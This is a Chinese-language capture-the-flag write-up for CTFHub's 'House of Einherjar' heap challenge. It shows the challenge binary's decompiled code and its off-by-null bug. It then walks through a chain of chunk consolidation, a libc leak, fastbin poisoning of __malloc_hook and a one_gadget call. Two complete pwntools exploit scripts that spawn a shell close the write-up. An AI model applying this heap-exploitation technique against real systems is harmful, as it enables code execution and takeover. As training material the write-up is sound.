CTFHub House of Einherjar

1777270934925-ceb49b60-926c-4346-a742-bbf31418199c.png

程序分析:

main

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
int __fastcall __noreturn main(int argc, const char **argv, const char **envp)
{
    int v3; // [rsp+24h] [rbp-Ch] BYREF
    unsigned __int64 v4; // [rsp+28h] [rbp-8h]

    v4 = __readfsqword(0x28u);
    init();
    while ( 1 )
    {
        while ( 1 )
        {
            menu();
            __isoc99_scanf(&unk_10C8, &v3);
            if ( v3 != 1 )
                break;
            add();
        }
        switch ( v3 )
        {
            case 3:
                delete();
                break;
            case 2:
                show();
                break;
            case 4:
                edit();
                break;
            case 5:
                puts("See you tomorrow~");
                exit(0);
            default:
                puts("Invalid choice!");
                break;
        }
    }
}

add

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
int add()
{
    int n; // eax
    int size; // [rsp+Ch] [rbp-14h] BYREF
    int id; // [rsp+10h] [rbp-10h] BYREF
    int index; // [rsp+14h] [rbp-Ch]
    unsigned __int64 v4; // [rsp+18h] [rbp-8h]

    v4 = __readfsqword(0x28u);
    printf("Give me a book ID: ");
    __isoc99_scanf(&unk_10C8, &id);
    printf("how long: ");
    __isoc99_scanf(&unk_10C8, &size);
    n = id;
    if ( id >= 0 )
    {
        n = id;
        if ( id <= 49 )
        {
            if ( size < 0 )
            {
                return puts("too large!");
            }
            else
            {
                index = id;
                chunk[index] = malloc(size);
                ::size[index] = size;
                return puts("Done!\n");
            }
        }
    }
    return n;
}

show

1
2
3
4
5
6
7
8
9
10
11
unsigned __int64 show()
{
    int v1; // [rsp+4h] [rbp-Ch] BYREF
    unsigned __int64 v2; // [rsp+8h] [rbp-8h]

    v2 = __readfsqword(0x28u);
    printf("Which book do you want to show?");
    __isoc99_scanf(&unk_10C8, &v1);
    printf("Content: %s", (const char *)chunk[v1]);
    return __readfsqword(0x28u) ^ v2;
}

delete

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
__int64 delete()
{
    unsigned int id; // [rsp+0h] [rbp-10h] BYREF
    unsigned __int64 v3; // [rsp+8h] [rbp-8h]

    v3 = __readfsqword(0x28u);
    id = 0;
    puts("Which one to throw?");
    __isoc99_scanf(&unk_10C8, &id);
    if ( id <= 0x32 )
    {
        free((void *)chunk[id]);
        chunk[id] = 0;
        return (unsigned int)puts("Done!\n");
    }
    else
    {
        return (unsigned int)puts("Wrong!\n");
    }
}

edit

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
int edit()
{
    int v1; // [rsp+0h] [rbp-10h] BYREF
    int v2; // [rsp+4h] [rbp-Ch]
    unsigned __int64 v3; // [rsp+8h] [rbp-8h]

    v3 = __readfsqword(0x28u);
    v2 = size[v1];
    printf("Which book to write?");
    __isoc99_scanf(&unk_10C8, &v1);
    if ( chunk[v1] )
    {
        printf("Content: ");
        read(0, (void *)chunk[v1], (unsigned int)(v2 + 1)); // off-by-null
        return puts("Done!\n");
    }
    else
    {
        printf("wrong!");
        return 0;
    }
}
  1. 堆布局与 Off-By-Null: 连续分配几个 Chunk,利用 edit 功能在 Chunk 1 中写入过多数据,溢出一个 \x00 字节,到紧邻的 Chunk 2 的头部,覆盖掉 PREV_INUSE 标志位。
  2. 触发向后合并 : 同时伪造 Chunk 2 的 prev_size。当释放 Chunk 2 时,glibc 会认为前面的很大一块内存包含已被释放的 Chunk 0 和正在使用的 Chunk 1都是空闲的,将它们合并成一个巨大的 Unsortedbin
  3. 信息泄露 (Libc Leak): 因为 Chunk 1 被包含在了这个巨大的 Unsorted Bin 中,当我们重新分配 Chunk 0 时,Chunk 1 的数据区就会被写入 main_arena 的地址(Unsorted Bin 的 fd 和 bk 指针)。打印 Chunk 1 即可泄露 libc 基址。
  4. Fastbin 投毒与 Hook 劫持: 释放处于巨大 Chunk 内部的 Fastbin 大小的块,利用重叠的指针修改其 fd,使其指向 __malloc_hook 附近的伪造块。
  5. Realloc 栈帧调整与 One Gadget:__malloc_hook 劫持为 realloc+16,将紧挨着的 __realloc_hook 劫持为 one_gadget。最后调用 malloc 触发执行链,成功 Get Shell。

EXP 思路:

堆布局与触发 Off-By-Null

1
2
3
4
5
6
7
8
9
10
11
add(0, 0xf0) # Chunk 0
add(1, 0x68) # Chunk 1
add(2, 0xf0) # Chunk 2 
add(3, 0x68) # Chunk 3 隔离块

free(0)
# Chunk 0 -> Unsorted Bin。

edit(1, p64(0)*12 + p64(0x170) + p8(0))

free(2)
  • 修改 chunk2 prev_size 和 prev_inuse 分别为 0x170 和 0,触发堆块向后合并,chunk012 进行合并。
1777276360156-0733512e-5daf-4341-9a63-94e1ed9353a8.png

泄露 Libc 基址

1
2
3
4
5
6
7
8
9
10
11
12
13
14
add(0, 0xf0) # 0
# 重新分配 0xf0 的块,这会从刚刚合并的大块中切下 0x100 给 Chunk 0
# 此时,剩下的 Unsorted Bin 的头部刚好落在 Chunk 1 的位置

show(1)
io.recvuntil(b"Content: ")
main_arena = u64(io.recv(6).ljust(8, b'\x00')) - 88


libc_base = main_arena - 0x10 - libc.sym['__malloc_hook']
malloc_hook = libc_base + libc.sym['__malloc_hook']

realloc_hook = libc_base + libc.sym["realloc"]
# 计算出 libc 基址、malloc_hook 和 realloc_hook 的真实地址。

4. 准备 Fastbin 投毒 (Fastbin Attack)

1
2
3
4
5
6
7
8
9
fake_size = malloc_hook - 0x23
# 利用0x7f欺骗glibc要过fastbin检查

add(4, 0x68) # 1

free(4)
# 释放 Chunk 4,将其放入大小为 0x70 的 Fastbin 中。

edit(1, p64(fake_size))
  • 由于 Chunk 1 还可以编辑,并且它和被释放的 Chunk 4 是重叠的。我们直接修改 Chunk 1,实际上就修改了已被放入 Fastbin 的 Chunk 4 的 fd 指针。我们将其 fd 指针改为了 fake_chunk (malloc_hook - 0x23)。
1777277390281-07043083-3b7f-411d-a1ac-fb109e99205f.png

5. 劫持 Hook 与 Realloc 调整栈帧

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
add(4, 0x68)
# 把刚才 free 的块申请回来,此时 Fastbin 的链表头就变成了 fake_chunk (malloc_hook - 0x23)。

add(3, 0xf0) 
# 清空 UnSortedbin

gdb.attach(io)
pause()

add(5, 0x68)
# 再次申请 0x68,系统会将伪造的 fake_chunk (malloc_hook - 0x23) 分配给我们

edit(5, b"a"*3 + p64(0) + p64(one_gadget) + p64(realloc_hook + 16))

# p64(one_gadget): 将 __realloc_hook 覆盖为 one_gadget。
# - p64(realloc_hook + 16): 将紧接着的 `__malloc_hook` 覆盖为 `realloc+16`。

add(5,0x68)之前:由于 fastbin 当中存放着 malloc_hook - 0x23,再次 add 的时候就会分配出来

1777278775357-d6987e96-038a-4d1e-a996-49d27852e3b6.png 1777279010422-0fc4622c-27f0-4081-a0af-67799966d088.png

6. add、触发 Shell

1
2
3
4
5
add(6, 0x10)

# 执行流: malloc -> __malloc_hook -> realloc+16 -> 调整栈帧 -> __realloc_hook -> one_gadget -> /bin/sh !

io.interactive()

Remote EXP:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
from pwn import *
context(log_level='debug', arch='amd64', os='linux')

io = remote("challenge-8d4853d8e5329665.sandbox.ctfhub.com", 20387)

elf = ELF('./enherjar')
libc = ELF("./libc-2.23.so")

def add(idx, size):
    io.recvuntil(b"Your choice: ")
    io.sendline(b"1")
    io.recvuntil(b"Give me a book ID: ")
    io.sendline(str(idx))
    io.recvuntil(b"how long: ")
    io.sendline(str(size))

def show(idx):
    io.recvuntil(b"Your choice: ")
    io.sendline(b"2")
    io.recvuntil(b"Which book do you want to show?")
    io.sendline(str(idx))

def free(idx):
    io.recvuntil(b"Your choice: ")
    io.sendline(b"3")
    io.recvuntil(b"Which one to throw?")
    io.sendline(str(idx))

def edit(idx, data):
    io.recvuntil(b"Your choice: ")
    io.sendline(b"4")
    io.recvuntil(b"Which book to write?")
    io.sendline(str(idx))
    io.recvuntil(b"Content: ")
    io.send(data)

add(0, 0xf0)
add(1, 0x68)
add(2, 0xf0)
add(3, 0x68)

free(0)
edit(1, p64(0)*12 + p64(0x170) + p8(0))
free(2)
add(0, 0xf0)

show(1)
io.recvuntil(b"Content: ")
main_arena = u64(io.recv(6).ljust(8, b'\x00'))
libc_base = main_arena - 88 - 0x10 - libc.sym['__malloc_hook']
malloc_hook = libc_base + libc.sym['__malloc_hook']
realloc_hook = libc_base + libc.sym["realloc"]
fake_chunk = malloc_hook - 0x23
        
gadget = [0x45216, 0x4526a, 0xf02a4, 0xf1147]
one_gadget = libc_base + gadget[1]

log.success('libc_base = {:#x}'.format(libc_base))
log.success('fake_chunk = {:#x}'.format(fake_chunk))

add(4, 0x68)
free(4)
edit(1, p64(fake_chunk))
add(4, 0x68)
add(3, 0xf0)
add(5, 0x68)
edit(5, b"a"*3 + p64(0) + p64(one_gadget) + p64(realloc_hook + 16))

add(6, 0x10)

io.interactive()
1777254340693-4f26d174-2c2b-4213-8868-c0393a00edb7.png

Local EXP:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
from pwn import *

context(log_level='debug', arch='amd64', os='linux')

# io = remote("challenge-8d4853d8e5329665.sandbox.ctfhub.com", 20387)
# libc = ELF('./libc-2.23.so')
io = process('./enherjar')

elf = ELF('./enherjar')
libc = ELF("/home/kali/Desktop/glibc-all-in-one/libs/2.23-0ubuntu3_amd64/libc-2.23.so")

def add(idx, size):
    io.recvuntil(b"Your choice: ")
    io.sendline(b"1")
    io.recvuntil(b"Give me a book ID: ")
    io.sendline(str(idx))
    io.recvuntil(b"how long: ")
    io.sendline(str(size))

def show(idx):
    io.recvuntil(b"Your choice: ")
    io.sendline(b"2")
    io.recvuntil(b"Which book do you want to show?")
    io.sendline(str(idx))

def free(idx):
    io.recvuntil(b"Your choice: ")
    io.sendline(b"3")
    io.recvuntil(b"Which one to throw?")
    io.sendline(str(idx))

def edit(idx, data):
    io.recvuntil(b"Your choice: ")
    io.sendline(b"4")
    io.recvuntil(b"Which book to write?")
    io.sendline(str(idx))
    io.recvuntil(b"Content: ")
    io.send(data)

add(0, 0xf0)
add(1, 0x68)
add(2, 0xf0)
add(3, 0x68)

free(0)
edit(1, p64(0)*12 + p64(0x170) + p8(0))
free(2)
add(0, 0xf0)

show(1)
io.recvuntil(b"Content: ")
main_arena = u64(io.recv(6).ljust(8, b'\x00'))
libc_base = main_arena - 88 - 0x10 - libc.sym['__malloc_hook']
malloc_hook = libc_base + libc.sym['__malloc_hook']
realloc_hook = libc_base + libc.sym["realloc"]
fake_chunk = malloc_hook - 0x23

# gadget = [0x45216, 0x4526a, 0xf02a4, 0xf1147] # remote_gadgets
# one_gadget = libc_base + gadget[1]  # remote

gadget = [0x4525a, 0xef9f4, 0xf0897]  # local_gadgets
one_gadget = libc_base + gadget[2]    # local


log.success('libc_base = {:#x}'.format(libc_base))
log.success('fake_chunk = {:#x}'.format(fake_chunk))

add(4, 0x68)
free(4)
edit(1, p64(fake_chunk))
add(4, 0x68)
add(3, 0xf0)
add(5, 0x68)
edit(5, b"a"*3 + p64(0) + p64(one_gadget) + p64(realloc_hook + 16))

add(6, 0x10)

io.interactive()

更新: 2026-04-27 19:03:44
原文: https://www.yuque.com/idcm/wnemg9/rm9lztbtgps8cz57